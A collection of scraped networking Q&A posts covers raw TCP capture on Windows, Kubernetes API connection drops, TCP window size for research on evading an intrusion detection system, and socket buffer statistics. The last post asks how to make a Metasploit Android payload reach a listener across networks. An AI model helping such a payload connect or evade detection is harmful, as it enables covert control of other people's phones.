How do I dump raw data from a TCP port in Windows using the netsh command?

I have an apparently simple issue which is proving very difficult to find an answer for.

The site has a highly-secured Windows Server 2019 installation and an appliance connected to it running on a certain TCP port.

I need a sample of the raw data coming out of that port, taken for a few minutes, dumped into a binary file. It needs to be as raw as possible (i.e. it needs to resemble what we would read from the TCP stream when we would connect to that same port from a local .NET application).

It is highly preferable to use only built-in Windows tools for this (i.e. netsh), but worst-case windump or telnet are also fine.

Go to Source
Author: Ruslan

Kubernetes API server unexpectedly stops responding

I have a managed Kubernetes cluster in Azure (AKS). There is one pod running a simple web service that responds to REST API calls from outside and calls the Kubernetes API server. These calls list and create some jobs.

For AKS, I have the ‘advanced’ (Azure CNI) networking with a custom routing table that redirects traffic to a virtual appliance – this is my company’s setup.

I’m using the official Python client for Kubernetes. The calls look like:

config.load_incluster_config()
k8s_batch_api_client = client.BatchV1Api()
jobs = k8s_batch_api_client.list_namespaced_job(namespace = 'default')

So nothing special.

Most of the time, everything is working fine. However, from time to time, the Kubernetes API server just doesn’t respond to the requests, so my pod’s web service gets restarted after a timeout (it runs a gunicorn-based web server).

I installed tcpdump on my pod and sniffed the TCP traffic. I’m not a networking nerd, so bear with me.

The Python client keeps a TCP connection pool (using the urllib3 library). And it seems that the Kubernetes API server just silently ‘loses’ a TCP connection, just doesn’t react anymore without closing the connection.

In Wireshark, I see this for a working request-response:

2438   09:41:50,796695   10.214.140.39    192.168.0.1     TLSv1.3   1614   Application Data
2439   09:41:50,798552   192.168.0.1      10.214.140.39   TCP       66     443 → 56480 [ACK]
2440   09:41:50,804064   192.168.0.1      10.214.140.39   TLSv1.3   2196   Application Data

10.214.140.39 is my pod, 192.168.0.1 is the Kubernetes API server. We see a request and a response here.

But then:

2469   09:48:48,853533   10.214.140.39   192.168.0.1      TLSv1.3   1580   Application Data
2470   09:48:48,853604   10.214.140.39   192.168.0.1      TLSv1.3   1279   Application Data
2471   09:48:48,868222   10.214.140.39   192.168.0.1      TCP       1279   [TCP Retransmission] 56480 → 443 [PSH, ACK]
2472   09:48:49,076276   10.214.140.39   192.168.0.1      TCP       1452   [TCP Retransmission] 56480 → 443 [ACK]
... lots of retransmissions...

I see no FIN TCP packet from the Kubernetes API server (which would mean, the server wants to close the connection).

After restarting (2 minutes of retransmissions -> reboot), my pod can establish a connection to the API server right away – so the API server itself isn’t overloaded.

The same app runs without any issues on my local Minikube cluster (but there’s of course only one node, so not really representative).

How can I investigate the issue further? Can it be caused by the client side (by my pod or by the Python client)? Is there any special setting I must change on AKS or on my client side to avoid this? Does it look like a ‘server bug’ or a ‘network issue’?

Go to Source
Author: dymanoid

What happens if a sender changes the TCP window size over multiple packets that have the same ACK number?

I’m currently doing research on evasion attacks that seek to bypass a Deep-learning based Network Intrusion Detection System.

In order to achieve this, I need to know what the constraints are for the TCP window size field in the TCP packet header. Imagine a client has just sent the last TCP-ACK packet to a server in order to complete the 3-way handshake. He then immediately proceeds to send a GET request to the server (these 2 packets are thus sent one after the other, and contain the same ACK-number).

What happens if the TCP window size in the TCP-ACK packet does not match the window size in the TCP packet containing the GET request? Will the receiver simply observe the last value for the window size that he obtained? Or will there be a violation in the TCP protocol in any way? You can assume that the change in window size is very small, and will not cause the buffer to be full.

More generally, if the client sends N uninterrupted packets (e.g. a heavy-load POST request), can he change the window size in each packet header without repercussions?

Go to Source
Author: Gints Engelen

Drawbacks of having pruned and collapsed packets

I am a newbie in networking field, I come across a note that we should not have pruned packets and collapsed packets, if we have, we should have to optimize the system.

But the note (neither the internet) didn’t provide much context on why we shouldn’t have pruned and collapsed packets and what problems that it makes?

$ netstat -s | grep socket      
299 packets pruned from receive queue because of socket buffer overrun
2701 TCP sockets finished time wait in fast timer
5 delayed acks further delayed because of locked socket
92 packets collapsed in receive queue due to low socket buffer

Here, you can see I have 299 packets which were pruned and 92 packets were collapsed.

Is it bad? if yes, why? what issues I will face due to this?

Go to Source
Author: smc

metasploit payload

metasploit payload

I’m use the ms f venom to make a payload app for android and i share the app to may another phone with it own network then i install the app but there was no reaction in my listener phone
for host i use my listener IP that was in the info of phone
what IP i have to use and the payload has to be on – t c p – or HTTP
when i use the same network for my phones payload is worked
thanks for Ur react .

Go to Source
Author: Sith fiLe